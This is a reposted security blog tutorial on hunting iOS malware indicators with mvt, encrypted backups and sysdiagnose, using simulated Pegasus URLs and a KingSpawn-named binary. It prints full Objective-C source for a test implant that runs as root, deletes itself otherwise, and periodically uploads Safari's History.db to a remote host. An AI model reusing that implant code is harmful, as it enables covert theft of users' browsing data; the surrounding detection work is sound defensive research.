Mobile Malware Analysis Part 5 – Analyzing An Infected Device

In the first part of iOS Malware Detection, as part of our Mobile Malware Analysis Series, we covered how to gather forensic artifacts, what tools to use for analysis, and which files on iOS are interesting. In this part, we will simulate a couple of IOCs and see how to search for them.

The first part will focus on opening a couple of links and searching for them using different methods (filesystem dump, backup and sysdiagnose), while the second part will focus on creating a binary with a name previously used by malware.

We will use mvt with the filesystem dump as well as with the backup. Additionally, we will see how to search for the same information using a sysdiagnose dump.

Visiting Malicious URLs

To simulate an infection, we will visit a couple of links which are indicators for Pegasus; they can be seen inside the Pegasus stix2 file that mvt ships with.

The URLs we will use:


Mvt

Before going with either of these two methods, we first need to download the IOCs for mvt. We can do that using the mvt-ios download-iocs command.


We can see that we have downloaded IOCs for malware such as Operation Triangulation, KingSpawn and Pegasus.

Filesystem Dump

The first method we will use is the filesystem dump. We can use ssh to dump the filesystem, followed by mvt-ios check-fs to actually analyse the dump.


After the filesystem dump has completed, we created a dump directory and extracted the filesystem dump into it.

All we have to do now is run mvt-ios check-fs against this directory, along with the directory where mvt will store its output (-o flag).


Once mvt has started, we can see that it has loaded all previously downloaded IOCs. A bit further down the output, we can see that it has matched the URL http://youintelligence.com against Pegasus’ domain name indicator youintelligence.com, from the records inside the Favicons.db database.


Following that, mvt has extracted the records from History.db, which is Safari's history file.


We can see that mvt has indeed found all of these malicious URLs, which are known IOCs for the Pegasus malware. Once mvt finishes, we can go to the directory we passed with the output flag and examine its contents. One of the most useful files in there is timeline_detected.csv, which contains the chronological timeline of all matched IOCs.


iTunes Backup

In the situation where the device is not jailbroken, we can analyse a backup instead. We can use Finder to back up the device, or we can use idevicebackup2 from libimobiledevice to do the backup.

One thing we should keep in mind is that encrypted backups provide more coverage, so we should aim to create one.

To create an encrypted backup, we use idevicebackup2 encryption on PASSWORD to turn on encryption.


Once encryption is turned on, we can start the backup with idevicebackup2 backup --full PATH_TO_OUTPUT_DIRECTORY. The output directory needs to be created prior to starting the actual backup.


Before we can actually analyse the backup, we first need to decrypt it, which we do with the mvt-ios decrypt-backup command; it accepts the password that was used to encrypt the backup along with the destination where the decrypted backup will be stored.


Now that we have a decrypted backup, we can analyse it using mvt-ios check-backup.


After the usual info from mvt, we can see that it has found the same IOCs as in the filesystem dump case. The same timeline_detected.csv file is also created inside the result directory.


There are of course more files in there, as with the filesystem dump, and if we are analysing potentially malicious activity it is worth checking all of them.

Sysdiagnose

The third method we can use is sysdiagnose. sysdiagnose is a native way to gather logs from the device.

We can trigger the sysdiagnose log collection using a key combination (holding Volume Up + Volume Down + Power button together). It takes a couple of minutes for the sysdiagnose logs to be generated.

Once sysdiagnose has finished, we can use ipsw idev crash pull to pull the sysdiagnose logs. We first need to obtain the name of the sysdiagnose log, which we can do using the ipsw idev crash ls command.


Once we have obtained the name, we just pass it to ipsw idev crash pull.


Once the logs are downloaded, we can extract the archive and start analysing it.


We will grep over all files present inside the sysdiagnose logs, but we won’t be able to find any of the URL IOCs. The reason is that sysdiagnose does not contain user data, and the browser history and the URLs it has visited belong to user data, not to the system.


As we can see, not a single match was found for these URL indicators. sysdiagnose is a great tool, but its main con is that it does not contain user data.

This marks the end of the analysis of malicious URLs; we will now move on to simulating a malicious binary, see how to hunt for it, and show that sysdiagnose can prove useful there.

Running Malicious Binary

In the previous section we saw how to search for URL IOCs, and that both the filesystem dump and the iTunes backup contain them; sysdiagnose did not, because it does not contain user data.

Now we will create a binary with the same name that was used in one of the known malware samples.

The binary will be simple and will have the following functionality:

  • we will name it subridged and place it in /private/var/db/com.apple.xpc.roleaccountd.staging/, as was done in KingSpawn

  • it must run as the root user; otherwise it deletes itself

  • edit /etc/hosts so that the domain resolves to our Mac's IP address instead of going through DNS

  • periodically dump the History.db file and send it to 8ksecmail.io (which points to our own Mac's IP address)

The full code is:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#import <Foundation/Foundation.h>

#include "base64.h"

#define TARGET  "/private/var/mobile/Library/Safari/History.db"

int clean(char *);

int main(int argc, char **argv)
{
    // check if we are root and remove ourselves if we are not
    if (getuid() != 0) {
        return clean(argv[0]);
    }

    FILE * f;

    for (;;) {
        f = fopen(TARGET, "rb");
        if (f == NULL)
        {
            return clean(argv[0]);
        }

        // read the whole History.db file into memory
        size_t sz;
        fseek(f, 0, SEEK_END);
        sz = ftell(f);
        fseek(f, 0, SEEK_SET);

        char * content = (char*)malloc(sz+1);
        if (content == NULL || fread(content, 1, sz, f) != sz) {
            fclose(f);
            free(content);
            return clean(argv[0]);
        }
        fclose(f);

        // base64 needs 4 output bytes per 3 input bytes plus a terminating NUL
        char * dest = (char*)malloc((sz + 2) / 3 * 4 + 1);

        Base64encode(dest, content, sz);

        // POST the encoded file to the server (our own Mac's IP address)
        NSMutableURLRequest *urlRequest = [[NSMutableURLRequest alloc] initWithURL:[NSURL URLWithString:@"http://192.168.100.62/history"]];
        NSString *postData = [NSString stringWithFormat:@"history=%s",dest];

        [urlRequest setHTTPMethod:@"POST"];

        NSData *data1 = [postData dataUsingEncoding:NSUTF8StringEncoding];

        [urlRequest setHTTPBody:data1];

        NSURLSession *session = [NSURLSession sharedSession];
        NSURLSessionDataTask *dataTask = [session dataTaskWithRequest:urlRequest completionHandler:^(NSData *data, NSURLResponse *response, NSError *error) {
            // the response is ignored
        }];
        [dataTask resume];

        free(content);
        free(dest);

        // wait five minutes before the next dump
        sleep(300);
    }

    return 0;
}

// delete the binary at path p and return a non-zero exit code
int clean(char *p)
{
    remove(p);
    return 1;
}

To simulate the web server, we will use the following HTTP response and use netcat to serve it:

HTTP/1.1 200 OK
Server: 8ksec
Content-Type: text/html; charset=UTF-8

<html>
    <head>
        <title>8ksecmal.io</title>
    </head>
    <body>
    <center>
        <p>Welcome to 8ksecmal.io</p>
    </center>
    </body>
</html>

After the binary has successfully contacted us, we will see the base64 representation of the History.db file being sent to us.


Mvt

Filesystem Dump & iTunes Backup

Since we have already covered how to do the filesystem dump and the iTunes backup, we will jump straight to the analysis.

Command: mvt-ios check-fs ./dump/ -o /tmp/mvt-fs

Once the filesystem has been loaded, we can see that the malicious binary we created and placed at that location has been identified as one of the IOCs from KingSpawn, which is excellent.


Taking a look at the Cache.db file for subridged, we can see the IP address to which the HTTP request was made as well as the response it got.


We could now proceed further by grabbing the binary and doing further analysis on it.

We will now do the same against the backup.

Command: mvt-ios check-backup /tmp/mvt-decrypted-backup -o /tmp/mvt-for-backup


What we can see is that the backup check did not find a match for our “malicious” binary, as those checks are part of the Filesystem module of mvt, so we had no luck with this one.

Even though subridged is present inside the osaanalytics.addaily.plist file, that was not enough to trigger the detection.


NOTE: as mvt-ios was stripping the “/” from the start of the filename, we had to hack it a bit, because otherwise it would never match our IOC (/private/var/db/com.apple.xpc.roleaccountd.staging/). This probably was not the right solution, but in our case it worked.
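As an added example (not mvt's own code, and not from the original post), here is a small Python matcher in the spirit of the checks walked through above: it parses domain-name and file:path indicators out of a STIX2 bundle, matches Safari History.db visits against the domain indicator the way the URL http://youintelligence.com was matched earlier, normalises the leading “/” that the note above describes so the staging path matches whether or not the slash was stripped, and orders the hits chronologically like timeline_detected.csv. The STIX bundle and the History.db tables are constructed stand-ins with only the columns needed.

```python
import json
import re
import sqlite3
from datetime import datetime, timedelta, timezone
from urllib.parse import urlparse

# Constructed STIX2 bundle (not mvt's indicator file) holding the Pegasus domain and
# the KingSpawn staging path from the walkthrough above.
STIX_BUNDLE = json.dumps({"type": "bundle", "objects": [
    {"type": "indicator", "pattern": "[domain-name:value = 'youintelligence.com']"},
    {"type": "indicator",
     "pattern": "[file:path = '/private/var/db/com.apple.xpc.roleaccountd.staging/']"},
    {"type": "malware", "name": "placeholder"},
]})
# Single-comparison STIX patterns such as  [domain-name:value = 'x']
PATTERN_RE = re.compile(r"\[(?P<kind>[\w-]+:[\w.-]+)\s*=\s*'(?P<value>[^']*)'\]")
MAC_EPOCH = datetime(2001, 1, 1, tzinfo=timezone.utc)  # Safari's visit_time epoch

def load_iocs(bundle_json):
    """Return {'domains': set, 'paths': set} from the bundle's indicator patterns."""
    iocs = {"domains": set(), "paths": set()}
    for obj in json.loads(bundle_json)["objects"]:
        m = PATTERN_RE.fullmatch(obj.get("pattern", "").strip())
        if obj.get("type") != "indicator" or not m:
            continue
        kind, value = m.group("kind"), m.group("value").lower()
        if kind == "domain-name:value":
            iocs["domains"].add(value)
        elif kind == "file:path":
            # Drop the leading/trailing "/" so a path recorded with or without it
            # (the leading-slash issue in the note above) still compares equal.
            iocs["paths"].add(value.strip("/"))
    return iocs

def mac_time_to_iso(seconds):
    """Convert Safari's visit_time (seconds since 2001-01-01 UTC) to ISO 8601."""
    return (MAC_EPOCH + timedelta(seconds=seconds)).isoformat()

def url_matches_domain(url, domains):
    """True if the URL's host is an indicator domain or a subdomain of one."""
    host = (urlparse(url).hostname or "").lower()
    return any(host == d or host.endswith("." + d) for d in domains)

def path_matches(path, paths):
    """True if the path is an indicator path or lies beneath an indicator directory."""
    p = path.strip("/")
    return any(p == ioc or p.startswith(ioc + "/") for ioc in paths)

def build_history_db():
    """Constructed stand-in for Safari's History.db with only the columns needed."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE history_items (id INTEGER PRIMARY KEY, url TEXT);
        CREATE TABLE history_visits (id INTEGER PRIMARY KEY, history_item INTEGER,
                                     visit_time REAL);
        INSERT INTO history_items VALUES (1, 'https://example.com/');
        INSERT INTO history_items VALUES (2, 'http://youintelligence.com/');
        INSERT INTO history_items VALUES (3, 'http://cdn.youintelligence.com/x');
        INSERT INTO history_visits VALUES (1, 2, 720000000.0);
        INSERT INTO history_visits VALUES (2, 1, 720000100.0);
        INSERT INTO history_visits VALUES (3, 3, 719999900.0);
    """)
    return db

def detect_history(db, iocs):
    """Return (timestamp, module, url) hits in time order, like timeline_detected.csv."""
    rows = db.execute("""SELECT v.visit_time, i.url FROM history_visits v
                         JOIN history_items i ON i.id = v.history_item""")
    return sorted((mac_time_to_iso(t), "safari_history", url)
                  for t, url in rows if url_matches_domain(url, iocs["domains"]))

def detect_paths(file_list, iocs):
    """Match paths as a filesystem dump or backup manifest lists them (with or without '/')."""
    return [p for p in file_list if path_matches(p, iocs["paths"])]
```

Pointing load_iocs at mvt's real indicator files and the detectors at a real History.db or file listing only requires replacing the constructed inputs.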


Sysdiagnose

After we have obtained the sysdiagnose logs, we can try grepping for the word subridged. As can be seen in the image below, we get a lot of matches.


Because subridged is also the name of a legitimate iPhone process, we can look at the ps.txt file, which contains the list of running processes, to get the PID of our subridged process, which in our case is 7749.

We can now do further analysis, such as looking at all of its threads or at its task info (taskinfo.txt) file.


Conclusion

This marks the end of our second blog post on iOS Malware Detection as part of our Mobile Malware Series. We have seen how we can utilise mvt (both the filesystem dump on a jailbroken device and the iTunes backup on a non-jailbroken device), as well as how sysdiagnose can be used on both. As you can see, each of these three has its pros and cons, and what to use depends on your possibilities; for example, sometimes you cannot jailbreak the device and you need to resort to the iTunes backup and sysdiagnose, which can sometimes miss a couple of useful artefacts.

Originally published by 8ksecresearch: Mobile Malware Analysis Part 5 – Analyzing An Infected Device

Reposted by admin on 1 December 2023 at 18:08.